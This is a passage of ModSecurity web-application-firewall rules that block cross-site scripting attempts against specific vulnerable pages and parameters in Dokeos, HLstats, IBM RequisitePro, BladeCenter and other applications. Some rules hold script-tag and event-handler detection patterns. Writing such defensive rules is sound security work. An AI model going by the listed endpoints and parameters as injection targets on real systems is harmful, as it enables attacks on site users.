s',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004595) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- info_book.asp Room_name SecRule REQUEST_LINE "@contains /room/info_book.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004595,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- info_book.asp Room_name',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469589/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:Room_name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- info_book.asp Room_name',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004596) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- week.asp curYear SecRule REQUEST_LINE "@contains /room/week.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004596,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- week.asp curYear',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469589/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:curYear/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- week.asp curYear',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004593) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokeos XSS Attempt -- editor.php img SecRule REQUEST_LINE "@contains /main/inc/lib/fckeditor/editor/plugins/ImageManager/editor.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004593,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Dokeos XSS Attempt -- editor.php img',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3974'" SecRule &TX:'/XSS.*ARGS:img/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokeos XSS Attempt -- editor.php img',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- listmembers.php show SecRule REQUEST_LINE "@contains /listmembers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003876,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- listmembers.php show',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23951'" SecRule &TX:'/XSS.*ARGS:show/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- listmembers.php show',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003877) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- stats.php show SecRule REQUEST_LINE "@contains /stats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003877,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- stats.php show',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23951'" SecRule &TX:'/XSS.*ARGS:show/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- stats.php show',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011153) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ektron CMS400.NET reterror.aspx info Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /WorkArea/reterror.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011153,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ektron CMS400.NET reterror.aspx info Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,39679'" SecRule &TX:'/XSS.*ARGS:info/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ektron CMS400.NET reterror.aspx info Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011154) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ektron CMS400.NET medialist.aspx selectids Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /workarea/medialist.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011154,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ektron CMS400.NET medialist.aspx selectids Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,39679'" SecRule &TX:'/XSS.*ARGS:selectids/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ektron CMS400.NET medialist.aspx selectids Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011256) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-add-excluded-ip.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011256,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:edit/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011257) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-add-excluded-url.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011257,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:edit/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011258) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-new-edit-site.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011258,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:site_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004586) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GMTT Music Distro XSS Attempt -- showown.php st SecRule REQUEST_LINE "@contains /showown.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004586,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS GMTT Music Distro XSS Attempt -- showown.php st',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469269/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:st/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GMTT Music Distro XSS Attempt -- showown.php st',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004563,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24066'" SecRule &TX:'/XSS.*ARGS:galix_cat_detail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004564) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_gal_detail SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004564,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_gal_detail',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24066'" SecRule &TX:'/XSS.*ARGS:galix_gal_detail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_gal_detail',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004565) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail_sort SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004565,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail_sort',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24066'" SecRule &TX:'/XSS.*ARGS:galix_cat_detail_sort/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail_sort',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004562) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gnatsweb and Gnats XSS Attempt -- gnatsweb.pl database SecRule REQUEST_LINE "@contains /gnatsweb.pl" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004562,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Gnatsweb and Gnats XSS Attempt -- gnatsweb.pl database',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25333'" SecRule &TX:'/XSS.*ARGS:database/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gnatsweb and Gnats XSS Attempt -- gnatsweb.pl database',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004554) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authusername SecRule REQUEST_LINE "@contains /hlstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004554,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authusername',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24102'" SecRule &TX:'/XSS.*ARGS:authusername/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authusername',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004555) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authpassword SecRule REQUEST_LINE "@contains /hlstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004555,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authpassword',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24102'" SecRule &TX:'/XSS.*ARGS:authpassword/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authpassword',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004560) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php SecRule REQUEST_LINE "@contains /hlstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004560,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24063'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004561) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php action SecRule REQUEST_LINE "@contains /hlstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004561,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php action',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24063'" SecRule &TX:'/XSS.*ARGS:action/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php action',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010770) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HP System Management Homepage Input Validation Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /smhui/getuiinfo" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010770,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS HP System Management Homepage Input Validation Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2009-4185'" SecRule REQUEST_LINE "@contains JS" "chain" SecRule &TX:'/XSS.*ARGS:servercert/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HP System Management Homepage Input Validation Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009647) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hubscript XSS Attempt SecRule REQUEST_LINE "@contains /patch/single_winner1.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009647,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hubscript XSS Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.com/0907-exploits/hubscript-xssphpinfo.txt'" SecRule ARGS_NAMES "(?i:bid_id)" "chain" SecRule REQUEST_LINE "@contains <script>" "chain" SecRule REQUEST_LINE "@contains </script>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hubscript XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010145) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM Rational RequisitePro ReqWebHelp Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/advanced/workingSet.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010145,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM Rational RequisitePro ReqWebHelp Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule REQUEST_LINE "@contains operation=add" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:(script|img|src|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM Rational RequisitePro ReqWebHelp Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp searchWord Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/basic/searchView.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010181,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp searchWord Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule &TX:'/XSS.*ARGS:searchWord/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp searchWord Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp maxHits Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/basic/searchView.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010182,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp maxHits Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule &TX:'/XSS.*ARGS:maxHits/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp maxHits Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010183) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scopedSearch Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/basic/searchView.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010183,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scopedSearch Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule &TX:'/XSS.*ARGS:scopedSearch/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scopedSearch Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010184) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scope Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/basic/searchView.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010184,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scope Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule &TX:'/XSS.*ARGS:scope/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scope Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010865) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Possible Lotus Domino readme.nsf Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /help/readme.nsf/Header" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010865,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Possible Lotus Domino readme.nsf Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/38481'" SecRule &TX:'/XSS.*ARGS:BaseTarget/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Possible Lotus Domino readme.nsf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010980) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM ENOVIA SmarTeam v5 LoginPage.aspx Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /WebEditor/Authentication/LoginPage.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010980,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM ENOVIA SmarTeam v5 LoginPage.aspx Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:errMsg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM ENOVIA SmarTeam v5 LoginPage.aspx Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011190) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module cindefn.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /private/cindefn.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011190,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module cindefn.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:INDEX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module cindefn.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_management_policy_options.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /private/power_management_policy_options.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011191,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_management_policy_options.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:domain/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_management_policy_options.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011192) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module pm_temp.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /private/pm_temp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011192,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module pm_temp.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:slot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module pm_temp.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011193) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_module.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /private/power_module.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011193,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_module.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:slot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_module.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011194) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module blade_leds.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /private/blade_leds.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011194,rev:3,msg:'SLR: 